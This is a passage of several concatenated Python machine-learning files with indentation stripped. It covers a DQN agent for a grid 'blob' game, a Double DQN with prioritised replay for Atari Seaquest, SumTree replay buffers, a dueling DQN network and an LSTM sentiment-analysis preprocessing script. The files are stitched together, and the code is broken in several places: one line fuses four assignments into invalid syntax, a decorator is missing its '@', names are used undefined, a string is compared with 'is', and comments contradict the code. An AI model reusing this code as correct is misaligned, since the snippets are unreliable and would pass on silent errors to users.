MIN_REWARD = -200 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 50_000
# Exploration settings
epsilon = 1.0 # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01
# Stats settings
AGGREGATE_STATS_EVERY = 100 # episodes
SHOW_PREVIEW = False
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=0)
elif choice == 1:
self.move(x=-1, y=0)
elif choice == 2:
self.move(x=0, y=1)
elif choice == 3:
self.move(x=0, y=-1)
def move(self, x=False, y=False):
# If no value for x, move randomly
if x is False:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if y is False:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
SIZE = 20
RETURN_IMAGES = False
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
# if RETURN_IMAGES:
# OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3) # 4
# else:
# OBSERVATION_SPACE_VALUES = (4,)
ACTION_SPACE_SIZE = 4
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, n_enemies=7):
self.n_enemies = n_enemies
self.n_states = len(self.reset())
def reset(self):
self.enemies = []
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
for i in range(self.n_enemies):
enemy = Blob(self.SIZE)
while enemy == self.player or enemy == self.food:
enemy = Blob(self.SIZE)
self.enemies.append(enemy)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
# all blob's coordinates
observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
# set the reward to move penalty by default
reward = -self.MOVE_PENALTY
if self.player == self.food:
# if the player hits the food, good reward
reward = self.FOOD_REWARD
else:
for enemy in self.enemies:
if enemy == self.player:
# if the player hits one of the enemies, heavy punishment
reward = -self.ENEMY_PENALTY
break
done = False
if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
for enemy in self.enemies:
env[enemy.x][enemy.y] = self.d[ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
env = BlobEnv()
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when trai8ning multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, state_in_image=True):
self.state_in_image = state_in_image
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
# get the NN input length
model = Sequential()
if self.state_in_image:
model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES)) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
else:
# model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
if self.state_in_image:
current_states = np.array([transition[0] for transition in minibatch])/255
else:
current_states = np.array([transition[0] for transition in minibatch])
current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
if self.state_in_image:
new_current_states = np.array([transition[3] for transition in minibatch])/255
else:
new_current_states = np.array([transition[3] for transition in minibatch])
future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
if self.state_in_image:
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
else:
# self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
if self.state_in_image:
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
else:
# return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
# Update tensorboard step every episode
agent.tensorboard.step = episode
# Restarting episode - reset episode reward and step number
episode_reward = 0
step = 1
# Reset environment and get initial state
current_state = env.reset()
# Reset flag and start iterating until episode ends
done = False
while not done:
# This part stays mostly the same, the change is to query a model for Q values
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(agent.get_qs(current_state))
else:
# Get random action
action = np.random.randint(0, env.ACTION_SPACE_SIZE)
new_state, reward, done = env.step(action)
# Transform new continous state to new discrete state and count reward
episode_reward += reward
if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
env.render()
# Every step we update replay memory and train main network
agent.update_replay_memory((current_state, action, reward, new_state, done))
agent.train(done, step)
current_state = new_state
step += 1
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if average_reward >= -220:
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# Decay epsilon
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy
import tensorflow as tf
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
IMAGE_STACK = 2
HUBER_LOSS_DELTA = 2.0
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
def __init__(self, **kwargs):
"""
Overriding init to set initial step and writer (one log file for multiple .fit() calls)
"""
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
def set_model(self, model):
"""
Overriding this method to stop creating default log writer
"""
pass
def on_epoch_end(self, epoch, logs=None):
"""
Overrided, saves logs with our step number
(if this is not overrided, every .fit() call will start from 0th step)
"""
self.update_stats(**logs)
def on_batch_end(self, batch, logs=None):
"""
Overrided, we train for one batch only, no need to save anything on batch end
"""
pass
def on_train_end(self, _):
"""
Overrided, we don't close the writer
"""
pass
def update_stats(self, **stats):
"""
Custom method for saving own metrics
Creates writer, writes custom metrics and closes writer
"""
self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
def huber_loss(y_true, y_pred):
err = y_true - y_pred
cond = K.abs(err) < HUBER_LOSS_DELTA
L2 = 0.5 * K.square(err)
L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
loss = tf.where(cond, L2, L1) # Keras does not cover where function in tensorflow :-(
return K.mean(loss)
def processImage( img ):
rgb = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b # extract luminance
o = gray.astype('float32') / 128 - 1 # normalize
return o
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
model_name = "conv2dx3"
class Brain:
def __init__(self, stateCnt, actionCnt):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.model = self._createModel()
self.model_ = self._createModel() # target network
# custom tensorboard
self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
def _createModel(self):
model = Sequential()
model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(units=512, activation='relu'))
model.add(Dense(units=actionCnt, activation='linear'))
opt = RMSprop(lr=LEARNING_RATE)
model.compile(loss=huber_loss, optimizer=opt)
return model
def train(self, x, y, epochs=1, verbose=0):
self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
def predict(self, s, target=False):
if target:
return self.model_.predict(s)
else:
return self.model.predict(s)
def predictOne(self, s, target=False):
return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
def updateTargetModel(self):
self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
def __init__(self, capacity):
self.tree = SumTree(capacity)
def _getPriority(self, error):
return (error + self.e) ** self.a
def add(self, error, sample):
p = self._getPriority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
segment = self.tree.total() / n
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
batch.append( (idx, data) )
return batch
def update(self, idx, error):
p = self._getPriority(error)
self.tree.update(idx, p)
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000
BATCH_SIZE = 32
GAMMA = 0.95
MAX_EPSILON = 1
MIN_EPSILON = 0.05
EXPLORATION_STOP = 500_000 # at this step epsilon will be 0.01
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000
UPDATE_STATS_EVERY = 5
RENDER_EVERY = 50
class Agent:
steps = 0
epsilon = MAX_EPSILON
def __init__(self, stateCnt, actionCnt, brain):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.brain = brain
# self.memory = Memory(MEMORY_CAPACITY)
def act(self, s):
if random.random() < self.epsilon:
return random.randint(0, self.actionCnt-1)
else:
return numpy.argmax(self.brain.predictOne(s))
def observe(self, sample): # in (s, a, r, s_) format
x, y, errors = self._getTargets([(0, sample)])
self.memory.add(errors[0], sample)
if self.steps % UPDATE_TARGET_FREQUENCY == 0:
self.brain.updateTargetModel()
# slowly decrease Epsilon based on our eperience
self.steps += 1
self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)
def _getTargets(self, batch):
no_state = numpy.zeros(self.stateCnt)
states = numpy.array([ o[1][0] for o in batch ])
states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
p = agent.brain.predict(states)
p_ = agent.brain.predict(states_, target=False)
pTarget_ = agent.brain.predict(states_, target=True)
x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
y = numpy.zeros((len(batch), self.actionCnt))
errors = numpy.zeros(len(batch))
for i in range(len(batch)):
o = batch[i][1]
s = o[0] a = o[1] r = o[2] s_ = o[3]
t = p[i]
oldVal = t[a]
if s_ is None:
t[a] = r
else:
t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ] # double DQN
x[i] = s
y[i] = t
errors[i] = abs(oldVal - t[a])
return (x, y, errors)
def replay(self):
batch = self.memory.sample(BATCH_SIZE)
x, y, errors = self._getTargets(batch)
# update errors
for i in range(len(batch)):
idx = batch[i][0]
self.memory.update(idx, errors[i])
self.brain.train(x, y)
class RandomAgent:
memory = Memory(MEMORY_CAPACITY)
exp = 0
epsilon = MAX_EPSILON
def __init__(self, actionCnt, brain):
self.actionCnt = actionCnt
self.brain = brain
def act(self, s):
return random.randint(0, self.actionCnt-1)
def observe(self, sample): # in (s, a, r, s_) format
error = abs(sample[2]) # reward
self.memory.add(error, sample)
self.exp += 1
def replay(self):
pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
def __init__(self, problem):
self.problem = problem
self.env = gym.make(problem)
self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)
def run(self, agent, step):
img = self.env.reset()
w = processImage(img)
s = numpy.array([w, w])
agent.brain.tensorboard.step = step
R = 0
while True:
if step % RENDER_EVERY == 0:
self.env.render()
a = agent.act(s)
img, r, done, info = self.env.step(a)
s_ = numpy.array([s[1], processImage(img)]) #last two screens
r = np.clip(r, -1, 1) # clip reward to [-1, 1]
if done: # terminal state
s_ = None
agent.observe( (s, a, r, s_) )
agent.replay()
s = s_
R += r
if done:
break
self.ep_rewards.append(R)
avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
if step % UPDATE_STATS_EVERY == 0:
min_reward = min(self.ep_rewards)
max_reward = max(self.ep_rewards)
agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:2f}.h5")
# print("Total reward:", R)
return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
print("Initialization with random agent...")
while randomAgent.exp < MEMORY_CAPACITY:
step += 1
env.run(randomAgent, step)
print(randomAgent.exp, "/", MEMORY_CAPACITY)
agent.memory = randomAgent.memory
randomAgent = None
print("Starting learning")
for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
env.run(agent, i)
finally:
agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
"""
This SumTree code is modified version of Morvan Zhou:
https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py
"""
data_pointer = 0
def __init__(self, length):
# number of leaf nodes (final nodes that contains experiences)
self.length = length
# generate the tree with all nodes' value = 0
# binary node (each node has max 2 children) so 2x size of leaf capacity - 1
# parent nodes = length - 1
# leaf nodes = length
self.tree = np.zeros(2*self.length - 1)
# contains the experiences
self.data = np.zeros(self.length, dtype=object)
def add(self, priority, data):
"""
Add priority score in the sumtree leaf and add the experience in data
"""
# look at what index we want to put the experience
tree_index = self.data_pointer + self.length - 1
#tree:
# 0
# / \
# 0 0
# / \ / \
#tree_index 0 0 0 We fill the leaves from left to right
self.data[self.data_pointer] = data
# update the leaf
self.update(tree_index, priority)
# increment data pointer
self.data_pointer += 1
# if we're above the capacity, we go back to the first index
if self.data_pointer >= self.length:
self.data_pointer = 0
def update(self, tree_index, priority):
"""
Update the leaf priority score and propagate the change through the tree
"""
# change = new priority score - former priority score
change = priority - self.tree[tree_index]
self.tree[tree_index] = priority
while tree_index != 0: # this method is faster than the recursive loop in the reference code
"""
Here we want to access the line above
THE NUMBERS IN THIS TREE ARE THE INDEXES NOT THE PRIORITY VALUES
0
/ \
1 2
/ \ / \
3 4 5 [6]
If we are in leaf at index 6, we updated the priority score
We need then to update index 2 node
So tree_index = (tree_index - 1) // 2
tree_index = (6-1)//2
tree_index = 2 (because // round the result)
"""
tree_index = (tree_index - 1) // 2
self.tree[tree_index] += change
"""
Here we get the leaf_index, priority value of that leaf and experience associated with that index
"""
def get_leaf(self, v):
"""
Tree structure and array storage:
Tree index:
0 -> storing priority sum
/ \
1 2
/ \ / \
3 4 5 6 -> storing priority for experiences
Array type for storing:
[0,1,2,3,4,5,6]
"""
parent_index = 0
while True: # the while loop is faster than the method in the reference code
left_child_index = 2 * parent_index + 1
right_child_index = left_child_index + 1
# If we reach bottom, end the search
if left_child_index >= len(self.tree):
leaf_index = parent_index
break
else: # downward search, always search for a higher priority node
if v <= self.tree[left_child_index]:
parent_index = left_child_index
else:
v -= self.tree[left_child_index]
parent_index = right_child_index
data_index = leaf_index - self.length + 1
return leaf_index, self.tree[leaf_index], self.data[data_index]
property
def total_priority(self):
return self.tree[0] # Returns the root node
class Memory:
# we use this to avoid some experiences to have 0 probability of getting picked
PER_e = 0.01
# we use this to make a tradeoff between taking only experiences with high priority
# and sampling randomly
PER_a = 0.6
# we use this for importance sampling, from this to 1 through the training
PER_b = 0.4
PER_b_increment_per_sample = 0.001
absolute_error_upper = 1.0
def __init__(self, capacity):
# the tree is composed of a sum tree that contains the priority scores and his leaf
# and also a data list
# we don't use deque here because it means that at each timestep our experiences change index by one
# we prefer to use a simple array to override when the memory is full
self.tree = SumTree(length=capacity)
def store(self, experience):
"""
Store a new experience in our tree
Each new experience have a score of max_priority (it'll be then improved)
"""
# find the max priority
max_priority = np.max(self.tree.tree[-self.tree.length:])
# if the max priority = 0 we cant put priority = 0 since this exp will never have a chance to be picked
# so we use a minimum priority
if max_priority == 0:
max_priority = self.absolute_error_upper
# set the max p for new p
self.tree.add(max_priority, experience)
def sample(self, n):
"""
- First, to sample a minimatch of k size, the range [0, priority_total] is / into k ranges.
- then a value is uniformly sampled from each range
- we search in the sumtree, the experience where priority score correspond to sample values are
retrieved from.
- then, we calculate IS weights for each minibatch element
"""
# create a sample list that will contains the minibatch
memory = []
b_idx, b_is_weights = np.zeros((n, ), dtype=np.int32), np.zeros((n, 1), dtype=np.float32)
# calculate the priority segment
# here, as explained in the paper, we divide the range [0, ptotal] into n ranges
priority_segment = self.tree.total_priority / n
# increase b each time
self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
# calculating the max weight
p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
max_weight = (p_min * n) ** (-self.PER_b)
for i in range(n):
a, b = priority_segment * i, priority_segment * (i + 1)
value = np.random.uniform(a, b)
# experience that correspond to each value is retrieved
index, priority, data = self.tree.get_leaf(value)
# P(j)
sampling_probs = priority / self.tree.total_priority
# IS = (1/N * 1/P(i))**b /max wi == (N*P(i))**-b /max wi
b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b)/ max_weight
b_idx[i]= index
experience = [data]
memory.append(experience)
return b_idx, memory, b_is_weights
def batch_update(self, tree_idx, abs_errors):
"""
Update the priorities on the tree
"""
abs_errors += self.PER_e
clipped_errors = np.min([abs_errors, self.absolute_error_upper])
ps = np.power(clipped_errors, self.PER_a)
for ti, p in zip(tree_idx, ps):
self.tree.update(ti, p)
import tensorflow as tf
class DDDQNNet:
""" Dueling Double Deep Q Neural Network """
def __init__(self, state_size, action_size, learning_rate, name):
self.state_size = state_size
self.action_size = action_size
self.learning_rate = learning_rate
self.name = name
# we use tf.variable_scope to know which network we're using (DQN or the Target net)
# it'll be helpful when we will update our w- parameters (by copy the DQN parameters)
with tf.variable_scope(self.name):
# we create the placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
# target Q
self.target_q = tf.placeholder(tf.float32, [None], name="target")
# neural net
self.dense1 = tf.layers.dense(inputs=self.inputs_,
units=32,
name="dense1",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense2 = tf.layers.dense(inputs=self.dense1,
units=32,
name="dense2",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense3 = tf.layers.dense(inputs=self.dense2,
units=32,
name="dense3",
kernel_initializer=tf.contrib.layers.xavier_initializer())
# here we separate into two streams (dueling)
# this one is State-Function V(s)
self.value = tf.layers.dense(inputs=self.dense3,
units=1,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation=None,
name="value"
)
# and this one is Value-Function A(s, a)
self.advantage = tf.layers.dense(inputs=self.dense3,
units=self.action_size,
activation=None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage"
)
# aggregation
# Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_))
self.absolute_errors = tf.abs(self.target_q - self.Q)
# w- * (target_q - q)**2
self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
import numpy
class SumTree:
write = 0
def __init__(self, capacity):
self.capacity = capacity
self.tree = numpy.zeros( 2*capacity - 1 )
self.data = numpy.zeros( capacity, dtype=object )
def _propagate(self, idx, change):
parent = (idx - 1) // 2
self.tree[parent] += change
if parent != 0:
self._propagate(parent, change)
def _retrieve(self, idx, s):
left = 2 * idx + 1
right = left + 1
if left >= len(self.tree):
return idx
if s <= self.tree[left]:
return self._retrieve(left, s)
else:
return self._retrieve(right, s-self.tree[left])
def total(self):
return self.tree[0]
def add(self, p, data):
idx = self.write + self.capacity - 1
self.data[self.write] = data
self.update(idx, p)
self.write += 1
if self.write >= self.capacity:
self.write = 0
def update(self, idx, p):
change = p - self.tree[idx]
self.tree[idx] = p
self._propagate(idx, change)
def get(self, s):
idx = self._retrieve(0, s)
dataIdx = idx - self.capacity + 1
return (idx, self.tree[idx], self.data[dataIdx])
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
with open("data/reviews.txt") as f:
reviews = f.read()
with open("data/labels.txt") as f:
labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words
# dictionary that maps vocab words to integers here
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start is 1 because 0 is encoded for blank
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encoded reviews
encoded_reviews = []
for review in reviews:
encoded_reviews.append([vocab2int[word] for word in review.split()])
encoded_reviews = np.array(encoded_reviews)
# print("Number of reviews:", len(encoded_reviews))
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
labels = [1 if label is 'positive' else 0 for label in labels]
# print("Number of labels:", len(labels))
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
if len(review) != 0:
cleaned_encoded_reviews.append(review)
cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews)
labels = cleaned_labels
# print("Number of reviews:", len(encoded_reviews))
# print("Number of labels:", len(labels))
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
features[i, -len(review):] = review[:sequence_length]
# print(features[:10, :100])
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
# X_train, X_validation = features[:split_frac*len(features)], features[split_frac*len(features):]
# y_train, y_validation = labels[:split]
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
# basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# RNN paramaters
lstm_size = 256
lstm_layers = 1
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
inputs = tf.placeholder(tf.int32, (None, None), "inputs")
labels = tf.placeholder(tf.int32, (None, None), "labels")
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
# embedding lookup matrix
